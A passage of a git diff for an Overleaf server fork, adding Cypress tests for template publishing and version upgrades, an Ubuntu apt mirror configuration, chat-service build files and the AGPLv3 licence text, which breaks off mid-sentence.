OVERLEAF_TEMPLATES_USER_ID: string + before(function () { + login(TEMPLATES_USER) + cy.visit('/') + cy.get('meta[name="ol-user_id"]').then(el => { + OVERLEAF_TEMPLATES_USER_ID = el.attr('content')! + }) + }) + + function varsFn() { + return { + OVERLEAF_TEMPLATES_USER_ID, + OVERLEAF_NEW_PROJECT_TEMPLATE_LINKS: + '[{"name":"All Templates","url":"/templates/all"}]', + } + } + + describe('enabled in Server Pro', () => { + if (isExcludedBySharding('PRO_CUSTOM_2')) return + startWith({ + pro: true, + varsFn, + }) + ensureUserExists({ email: REGULAR_USER }) + ensureUserExists({ email: ADMIN_USER, isAdmin: true }) + + it('should show templates link on welcome page', () => { + login(WITHOUT_PROJECTS_USER) + cy.visit('/') + cy.findByText(LABEL_BROWSE_TEMPLATES).click() + cy.url().should('match', /\/templates$/) + }) + + it('should have templates feature', () => { + login(TEMPLATES_USER) + const name = `Template ${Date.now()}` + const description = `Template Description ${Date.now()}` + + cy.visit('/') + createProject(name).as('templateProjectId') + + cy.get('header').findByText('Menu').click() + cy.findByText('Manage Template').click() + + cy.findByText('Template Description') + .click() + .parent() + .get('textarea') + .type(description) + cy.findByText('Publish').click() + cy.findByText('Publishing…').parent().should('be.disabled') + cy.findByText('Publish').should('not.exist') + cy.findByText('Unpublish', { timeout: 10_000 }) + cy.findByText('Republish') + + cy.findByText('View it in the template gallery').click() + cy.url() + .should('match', /\/templates\/[a-f0-9]{24}$/) + .as('templateURL') + + cy.findAllByText(name).first().should('exist') + cy.findByText(description) + cy.findByText('Open as Template') + cy.findByText('Unpublish') + cy.findByText('Republish') + cy.get('img') + .should('have.attr', 'src') + .and('match', /\/v\/0\//) + cy.findByText('Republish').click() + cy.findByText('Publishing…').parent().should('be.disabled') + cy.findByText('Republish', { timeout: 10_000 }) + cy.get('img', { timeout: 10_000 }) + .should('have.attr', 'src') + .and('match', /\/v\/1\//) + + // custom tag + const tagName = `${Date.now()}` + cy.visit('/') + cy.findByText(name) + .parent() + .parent() + .within(() => cy.get('input[type="checkbox"]').first().check()) + cy.get('.project-list-sidebar-react').within(() => { + cy.findAllByText('New Tag').first().click() + }) + cy.focused().type(tagName) + cy.findByText('Create').click() + cy.get('.project-list-sidebar-react').within(() => { + cy.findByText(tagName) + .parent() + .within(() => cy.get('.name').should('have.text', `${tagName} (1)`)) + }) + + // Check listing + cy.visit('/templates') + cy.findByText(tagName) + cy.visit('/templates/all') + cy.findByText(name) + cy.visit(`/templates/${tagName}`) + cy.findByText(name) + + // Unpublish via template page + cy.get('@templateURL').then(url => cy.visit(`${url}`)) + cy.findByText('Unpublish').click() + cy.url().should('match', /\/templates$/) + cy.get('@templateURL').then(url => + cy.visit(`${url}`, { + failOnStatusCode: false, + }) + ) + cy.findByText('Not found') + cy.visit('/templates/all') + cy.findByText(name).should('not.exist') + cy.visit(`/templates/${tagName}`) + cy.findByText(name).should('not.exist') + + // Publish again + cy.get('@templateProjectId').then(projectId => + cy.visit(`/project/${projectId}`) + ) + cy.get('header').findByText('Menu').click() + cy.findByText('Manage Template').click() + cy.findByText('Publish').click() + cy.findByText('Unpublish', { timeout: 10_000 }) + + // Should assign a new template id + cy.findByText('View it in the template gallery').click() + cy.url() + .should('match', /\/templates\/[a-f0-9]{24}$/) + .as('newTemplateURL') + cy.get('@newTemplateURL').then(newURL => { + cy.get('@templateURL').then(prevURL => { + expect(newURL).to.match(/\/templates\/[a-f0-9]{24}$/) + expect(prevURL).to.not.equal(newURL) + }) + }) + + // Open project from template + login(REGULAR_USER) + cy.visit('/templates') + cy.findByText(tagName).click() + cy.findByText(name).click() + cy.findByText('Open as Template').click() + cy.url().should('match', /\/project\/[a-f0-9]{24}$/) + cy.get('.project-name').findByText(name) + cy.get('header').findByText('Menu').click() + cy.findByText('Word Count') // wait for lazy loading + cy.findByText('Manage Template').should('not.exist') + + // Check management as regular user + cy.get('@newTemplateURL').then(url => cy.visit(`${url}`)) + cy.findByText('Open as Template') + cy.findByText('Unpublish').should('not.exist') + cy.findByText('Republish').should('not.exist') + + // Check management as admin user + login(ADMIN_USER) + cy.get('@newTemplateURL').then(url => cy.visit(`${url}`)) + cy.findByText('Open as Template') + cy.findByText('Unpublish') + cy.findByText('Republish') + cy.get('@templateProjectId').then(projectId => + cy.visit(`/project/${projectId}`) + ) + cy.get('header').findByText('Menu').click() + cy.findByText('Manage Template').click() + cy.findByText('Unpublish') + + // Back to templates user + login(TEMPLATES_USER) + + // Unpublish via editor + cy.get('@templateProjectId').then(projectId => + cy.visit(`/project/${projectId}`) + ) + cy.get('header').findByText('Menu').click() + cy.findByText('Manage Template').click() + cy.findByText('Unpublish').click() + cy.findByText('Publish') + cy.visit('/templates/all') + cy.findByText(name).should('not.exist') + + // check for template links, after creating the first project + cy.visit('/') + cy.findAllByRole('button') + .contains(/new project/i) + .click() + cy.findAllByText('All Templates') + .first() + .parent() + .should('have.attr', 'href', '/templates/all') + }) + }) + + function checkDisabled() { + it('should not have templates feature', () => { + login(TEMPLATES_USER) + + cy.visit('/') + createProject('maybe templates') + + cy.get('header').findByText('Menu').click() + cy.findByText('Word Count') // wait for lazy loading + cy.findByText('Manage Template').should('not.exist') + + cy.visit('/templates', { failOnStatusCode: false }) + cy.findByText('Not found') + cy.visit('/templates/all', { failOnStatusCode: false }) + cy.findByText('Not found') + + // check for template links, after creating the first project + cy.visit('/') + cy.findAllByRole('button') + .contains(/new project/i) + .click() + cy.findAllByText('All Templates').should('not.exist') + }) + + it('should not show templates link on welcome page', () => { + login(WITHOUT_PROJECTS_USER) + cy.visit('/') + cy.findByText(/new project/i) // wait for lazy loading + cy.findByText(LABEL_BROWSE_TEMPLATES).should('not.exist') + }) + } + + describe('disabled Server Pro', () => { + if (isExcludedBySharding('PRO_DEFAULT_2')) return + startWith({ pro: true }) + checkDisabled() + }) + + describe('unavailable in CE', () => { + if (isExcludedBySharding('CE_CUSTOM_1')) return + startWith({ + pro: false, + varsFn, + }) + checkDisabled() + }) +}) diff --git a/server-ce/test/tsconfig.json b/server-ce/test/tsconfig.json new file mode 100644 index 0000000..8d72981 --- /dev/null +++ b/server-ce/test/tsconfig.json @@ -0,0 +1,17 @@ +{ + "compilerOptions": { + "target": "esnext" /* Specify ECMAScript target version */, + "module": "es2020" /* Specify module code generation */, + "allowJs": true /* Allow JavaScript files to be compiled. */, + // "checkJs": true /* Report errors in .js files. */, + "jsx": "preserve" /* Specify JSX code generation */, + "noEmit": true /* Do not emit outputs. */, + "strict": true /* Enable all strict type-checking options. */, + "moduleResolution": "node" /* Specify module resolution strategy */, + "esModuleInterop": true /* Enables emit interoperability between CommonJS and ES Modules via creation of namespace objects for all imports. Implies 'allowSyntheticDefaultImports'. */, + "skipLibCheck": true /* Skip type checking of declaration files. */, + "forceConsistentCasingInFileNames": true /* Disallow inconsistently-cased references to the same file. */, + "types": ["cypress", "node", "@testing-library/cypress"] + }, + "include": ["**/*.ts", "**/*.tsx"] +} diff --git a/server-ce/test/upgrading.spec.ts b/server-ce/test/upgrading.spec.ts new file mode 100644 index 0000000..16e0320 --- /dev/null +++ b/server-ce/test/upgrading.spec.ts @@ -0,0 +1,226 @@ +import { ensureUserExists, login } from './helpers/login' +import { isExcludedBySharding, startWith } from './helpers/config' +import { dockerCompose, runScript } from './helpers/hostAdminClient' +import { createProject, openProjectByName } from './helpers/project' +import { throttledRecompile } from './helpers/compile' +import { v4 as uuid } from 'uuid' + +const USER = 'user@example.com' +const PROJECT_NAME = 'Old Project' + +describe('Upgrading', function () { + if (isExcludedBySharding('PRO_CUSTOM_3')) return + + function testUpgrade( + steps: { + version: string + vars?: Object + newProjectButtonMatcher?: RegExp + hook?: () => void + }[] + ) { + const startOptions = steps.shift()! + + before(async () => { + cy.log('Create old instance') + }) + startWith({ + pro: true, + version: startOptions.version, + withDataDir: true, + resetData: true, + vars: startOptions.vars, + }) + before(function () { + cy.log('Create initial user after deleting it') + }) + ensureUserExists({ email: USER }) + before(() => { + cy.log('Populate old instance') + login(USER) + createProject(PROJECT_NAME, { + newProjectButtonMatcher: startOptions.newProjectButtonMatcher, + }) + const recompile = throttledRecompile() + cy.log('Wait for successful compile') + cy.get('.pdf-viewer').should('contain.text', PROJECT_NAME) + + cy.log('Increment the doc version three times') + for (let i = 0; i < 3; i++) { + cy.log('Add content') + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle') + .parent() + .type(`\n\\section{{}Old Section ${i}}`) + + cy.log('Trigger full flush') + recompile() + cy.get('header').findByText('Menu').click() + cy.findByText('Source').click() + cy.get('.left-menu-modal-backdrop').click({ force: true }) + } + + cy.log('Check compile and history') + for (let i = 0; i < 3; i++) { + cy.get('.pdf-viewer').should('contain.text', `Old Section ${i}`) + } + cy.findByText('History').click() + for (let i = 0; i < 3; i++) { + cy.findByText(new RegExp(`\\\\section\{Old Section ${i}}`)) + } + }) + + for (const step of steps) { + before(() => { + cy.log(`Upgrade to version ${step.version}`) + + // Navigate way from editor to avoid redirect to /login when the next instance comes up (which slows down tests) + cy.visit('/project', {}) + }) + before(async function () { + cy.log('Graceful shutdown: flush all the things') + this.timeout(20 * 1000) + // Ideally we could use the container shutdown procedure, but it's too slow and unreliable for tests. + // TODO(das7pad): adopt the below after speeding up the graceful shutdown procedure on all supported releases + // await dockerCompose('stop', 'sharelatex') + + // For now, we are stuck with manually flushing things + await runScript({ + cwd: 'services/document-updater', + script: 'scripts/flush_all.js', + }) + await runScript({ + cwd: 'services/project-history', + script: 'scripts/flush_all.js', + }) + }) + startWith({ + pro: true, + version: step.version, + vars: step.vars, + withDataDir: true, + }) + + step.hook?.() + } + beforeEach(() => { + login(USER) + }) + + it('should list the old project', () => { + cy.visit('/project') + cy.findByText(PROJECT_NAME) + }) + + it('should open the old project', () => { + openProjectByName(PROJECT_NAME) + + cy.url().should('match', /\/project\/[a-fA-F0-9]{24}/) + cy.findByRole('navigation').within(() => { + cy.findByText(PROJECT_NAME) + }) + const recompile = throttledRecompile() + + cy.log('wait for successful compile') + cy.get('.pdf-viewer').should('contain.text', PROJECT_NAME) + cy.get('.pdf-viewer').should('contain.text', 'Old Section 2') + + cy.log('Add more content') + const newSection = `New Section ${uuid()}` + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle').parent().type(`\n\\section{{}${newSection}}`) + + cy.log('Check compile and history') + recompile() + cy.get('.pdf-viewer').should('contain.text', newSection) + cy.findByText('History').click() + cy.findByText(/\\section\{Old Section 2}/) + cy.findByText(new RegExp(`\\\\section\\{${newSection}}`)) + }) + } + + const optionsFourDotTwo = { + version: '4.2', + vars: { + // Add core vars with old branding + SHARELATEX_SITE_URL: 'http://sharelatex', + SHARELATEX_MONGO_URL: 'mongodb://mongo/sharelatex', + SHARELATEX_REDIS_HOST: 'redis', + }, + newProjectButtonMatcher: /create first project/i, + } + describe('from 4.2 to latest', () => { + testUpgrade([optionsFourDotTwo, { version: 'latest' }]) + }) + describe('from 5.0 to latest', () => { + testUpgrade([{ version: '5.0' }, { version: 'latest' }]) + }) + describe('doc version recovery', () => { + testUpgrade([ + optionsFourDotTwo, + { + version: '5.0.1-RC1', + hook() { + before(function () { + login(USER) + cy.visit('/') + cy.findByText(PROJECT_NAME).click() + const recompile = throttledRecompile() + + cy.log('Make a change') + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle') + .parent() + .type('\n\\section{{}FiveOOne Section}') + + cy.log('Trigger flush') + recompile() + cy.get('.pdf-viewer').should('contain.text', 'FiveOOne Section') + + cy.log('Check for broken history, i.e. not synced with latest edit') + cy.findByText('History').click() + cy.findByText(/\\section\{Old Section 2}/) // wait for lazy loading + cy.findByText(/\\section\{FiveOOne Section}/).should('not.exist') + }) + }, + }, + { + version: 'latest', + hook() { + before(async function () { + this.timeout(20_000) + const needle = 'Finished resyncing history for all projects.' + for (let i = 0; i < 30; i++) { + const { stdout } = await dockerCompose('logs', 'sharelatex') + if (stdout.includes(needle)) { + return + } + await new Promise(resolve => setTimeout(resolve, 500)) + } + const { stdout } = await dockerCompose('logs', 'sharelatex') + expect(stdout).to.contain( + needle, + 'Doc version recovery did not finish yet.' + ) + }) + + before(function () { + login(USER) + cy.visit('/') + cy.findByText(PROJECT_NAME).click() + + cy.log( + 'The edit that was made while the history was broken should be there now.' + ) + cy.findByText('History').click() + cy.findByText(/\\section\{FiveOOne Section}/) + + // TODO(das7pad): restore after https://github.com/overleaf/internal/issues/19588 is fixed. + // cy.log('Check indicator of force resync') + // cy.findByText('Overleaf History System') + }) + }, + }, + ]) + }) +}) diff --git a/server-ce/ubuntu.sources b/server-ce/ubuntu.sources new file mode 100644 index 0000000..ea29354 --- /dev/null +++ b/server-ce/ubuntu.sources @@ -0,0 +1,39 @@ +Types: deb +URIs: https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports +Suites: noble noble-updates noble-backports +Components: main restricted universe multiverse +Signed-By: /usr/share/keyrings/ubuntu-archive-keyring.gpg + +# 默认注释了源码镜像以提高 apt update 速度,如有需要可自行取消注释 +# Types: deb-src +# URIs: https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports +# Suites: noble noble-updates noble-backports +# Components: main restricted universe multiverse +# Signed-By: /usr/share/keyrings/ubuntu-archive-keyring.gpg + +# 以下安全更新软件源包含了官方源与镜像站配置,如有需要可自行修改注释切换 +Types: deb +URIs: http://ports.ubuntu.com/ubuntu-ports/ +Suites: noble-security +Components: main restricted universe multiverse +Signed-By: /usr/share/keyrings/ubuntu-archive-keyring.gpg + +# Types: deb-src +# URIs: http://ports.ubuntu.com/ubuntu-ports/ +# Suites: noble-security +# Components: main restricted universe multiverse +# Signed-By: /usr/share/keyrings/ubuntu-archive-keyring.gpg + +# 预发布软件源,不建议启用 + +# Types: deb +# URIs: https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports +# Suites: noble-proposed +# Components: main restricted universe multiverse +# Signed-By: /usr/share/keyrings/ubuntu-archive-keyring.gpg + +# # Types: deb-src +# # URIs: https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports +# # Suites: noble-proposed +# # Components: main restricted universe multiverse +# # Signed-By: /usr/share/keyrings/ubuntu-archive-keyring.gpg \ No newline at end of file diff --git a/services/chat/.gitignore b/services/chat/.gitignore new file mode 100644 index 0000000..f0cf94b --- /dev/null +++ b/services/chat/.gitignore @@ -0,0 +1,12 @@ +**.swp + +public/build/ + +node_modules/ + +plato/ + +**/*.map + +# managed by dev-environment$ bin/update_build_scripts +.npmrc diff --git a/services/chat/.mocharc.json b/services/chat/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/chat/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/chat/.nvmrc b/services/chat/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/chat/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/chat/Dockerfile b/services/chat/Dockerfile new file mode 100644 index 0000000..14056c2 --- /dev/null +++ b/services/chat/Dockerfile @@ -0,0 +1,27 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/chat + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/chat/package.json /overleaf/services/chat/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/chat/ /overleaf/services/chat/ + +FROM app +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/chat/LICENSE b/services/chat/LICENSE new file mode 100644 index 0000000..ac8619d --- /dev/null +++ b/services/chat/LICENSE @@ -0,0 +1,662 @@ + + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be 